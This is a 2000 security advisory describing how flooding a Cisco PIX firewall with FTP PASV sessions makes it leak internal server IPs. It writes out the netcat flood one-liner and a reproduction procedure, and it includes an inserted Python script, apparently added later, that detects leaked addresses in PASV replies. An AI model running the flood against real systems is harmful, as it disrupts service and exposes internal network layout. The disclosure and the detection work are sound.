Title: Cisco PIX Firewall allows external users to discover internal IPs
Released by: naif
Date: 3rd October 2000
Hi, the vulnerability named in the Subject is explained here...
Attached files:
- Script used for the DoS: pasvDOS.sh
- Logs of the script: PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2
- Log of the debug output: debug_ftp.txt.bz2
The log of the latest session, against the second PIX (whose service network
is 192.168.3.0/24), is at:
http://naif.itapac.net/PIXLOG_latest_192_168.bz2
because it's too big to attach to a mailing list.
====
PIX TESTED:
Cisco Secure PIX Firewall Version 5.2(2)
Compiled on Sun 24-Sep-00 18:59 by morlee
skifo-pix up 16 hours 55 mins
Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB
0: ethernet0: address is 00d0.b790.5685, irq 11
1: ethernet1: address is 00e0.b601.cfbd, irq 15
2: ethernet2: address is 00e0.b601.cfbc, irq 10
3: ethernet3: address is 00e0.b601.cfbb, irq 9
4: ethernet4: address is 00e0.b601.cfba, irq 11
5: ethernet5: address is 00d0.b790.512e, irq 10
Licensed Features:
Failover: Enabled
VPN-DES: Enabled
VPN-3DES: Disabled
Maximum Interfaces: 6
Cut-through Proxy: Enabled
Guards: Enabled
Websense: Enabled
Throughput: Unlimited
ISAKMP peers: Unlimited
Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :(
I tried to fill the PIX memory with the attached pasvDOS.sh shell script piped through netcat, but
I obtained other results...
Then, from the command line:
[~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG&
but before starting the "PASV FLOOD" I start logging my ssh session, so we have a log of all the FTP FIXUP DEBUG output...
[~] $ script debug_ftp.txt
The PIX starts revealing the real IP of the server immediately after
it kicks me off ssh with the following error:
Local: Corrupted check bytes on input.
NOW it starts replying to my PASV command with the REAL internal IP address of the server...
===== Normal Situation
227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237)
===== Under this kind of DoS, after the 21st FTP session flooding the PIX with PASV
227 Entering Passive Mode (172,16,1,2,6,113)
After that I changed PIX and network; on another PIX with 5.2(2) I could obtain, with
this DoS:
227 Entering Passive Mode (192,168,3,2,99,37)
Et voilà...
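The check a practitioner would want here is an automated one: through a correctly working firewall the address in every 227 reply must be the firewall's outside address, so an RFC 1918 address (or any address other than the expected public one) in a PASV reply is exactly the translation failure shown above. The script below is an added example and is not the advisory's pasvDOS.sh: it parses 227 replies, flags leaked internal addresses, and can open an FTP control session and send PASV repeatedly to collect replies while the flood is running. The hostname, the anonymous login, the 30 PASV commands per session, and 203.0.113.10 standing in for the redacted public address (xxx,xxx,xxx,xx) are assumptions; the sample replies are constructed from the values quoted in the advisory.

```python
"""Audit FTP 227 (PASV) replies for the NAT translation failure described in
the advisory.  Added example, not the advisory's pasvDOS.sh; the hostname,
login, PASV count and the 203.0.113.10 public address are assumptions."""
import ipaddress
import re
import socket
from typing import List, Optional, Tuple

# RFC 1918 ranges; the leaked 172.16.1.2 and 192.168.3.2 fall inside them.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# "227 <text> h1,h2,h3,h4,p1,p2" -- the parentheses are optional per RFC 1123 4.1.2.6.
PASV_RE = re.compile(r"227\D*(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def parse_pasv(reply: str) -> Optional[Tuple[str, int]]:
    """Return (host, port) from a 227 reply, or None if it is not a valid 227."""
    for line in reply.splitlines():
        m = PASV_RE.match(line)
        if not m:
            continue
        h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
        if max(h1, h2, h3, h4, p1, p2) > 255:
            return None
        return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2
    return None


def leaks_internal_address(reply: str, expected_public_ip: Optional[str] = None) -> bool:
    """True if the 227 reply carries an address the firewall should have rewritten."""
    parsed = parse_pasv(reply)
    if parsed is None:
        return False
    addr = ipaddress.ip_address(parsed[0])
    if any(addr in net for net in RFC1918):
        return True
    return expected_public_ip is not None and parsed[0] != expected_public_ip


def audit(replies: List[str], expected_public_ip: Optional[str] = None) -> List[Tuple[str, int]]:
    """Return the (host, port) pair of every leaking 227 reply, in order."""
    leaked = []
    for reply in replies:
        if leaks_internal_address(reply, expected_public_ip):
            parsed = parse_pasv(reply)
            assert parsed is not None
            leaked.append(parsed)
    return leaked


def _read_reply(rfile) -> str:
    """Read one FTP reply, including 'xyz-' multi-line continuations."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:
            break
        line = raw.decode("latin-1").rstrip("\r\n")
        lines.append(line)
        if len(line) >= 4 and line[:3].isdigit() and line[3] == " ":
            break
    return "\n".join(lines)


def probe(host: str, port: int = 21, pasv_count: int = 30, timeout: float = 5.0,
          user: str = "anonymous", password: str = "probe@example.invalid") -> List[str]:
    """Log in once and send PASV repeatedly; return the raw replies for audit().
    Needs network access, so the offline sample below is used instead of it."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        rfile = s.makefile("rb")
        _read_reply(rfile)  # 220 banner
        for cmd in (f"USER {user}", f"PASS {password}"):
            s.sendall((cmd + "\r\n").encode("ascii"))
            _read_reply(rfile)
        for _ in range(pasv_count):
            s.sendall(b"PASV\r\n")
            replies.append(_read_reply(rfile))
        s.sendall(b"QUIT\r\n")
    return replies


# Constructed sample: one correctly translated reply (203.0.113.10 stands in for the
# redacted xxx,xxx,xxx,xx), the two leaked replies quoted in the advisory, and a failure.
SAMPLE_REPLIES = [
    "227 Entering Passive Mode (203,0,113,10,18,237)",
    "227 Entering Passive Mode (172,16,1,2,6,113)",
    "227 Entering Passive Mode (192,168,3,2,99,37)",
    "425 Can't open data connection",
]

if __name__ == "__main__":
    for host, port in audit(SAMPLE_REPLIES, expected_public_ip="203.0.113.10"):
        print(f"LEAK: internal server {host} offered data port {port}")
```

To reproduce the observation above, run probe() against the FTP server's public address while the PASV flood is running and pass the replies to audit() with the firewall's outside address as expected_public_ip; a non-empty result is the leak. Non-227 replies (such as 425) are ignored rather than counted as leaks.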
Trying to reproduce this kind of DoS/exploit, it works only sometimes...
After a reload it usually works after the following:
- I start (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG&
- I leave it running for some minutes
- I kill all connections by killing the "nc" processes
- Wait for 2/3 minutes
- Restart with (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG&
but I cannot figure out why.
I noticed that using "fixup ftp strict 21" could block this kind of attack,
and the error in the debug output is:
get_cmd: ERR: command not terminated
but it's also true that with "fixup ftp strict 21" many FTP clients don't work with FTP servers inside the PIX...
p.s. all ppl now know that "mork" has to offer me a lunch ;)
Pietrosanti Fabio (naif)
E-mail: naif@inet.it
PGP Key (DSS) http://naif.itapac.net/naif.asc
--
Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS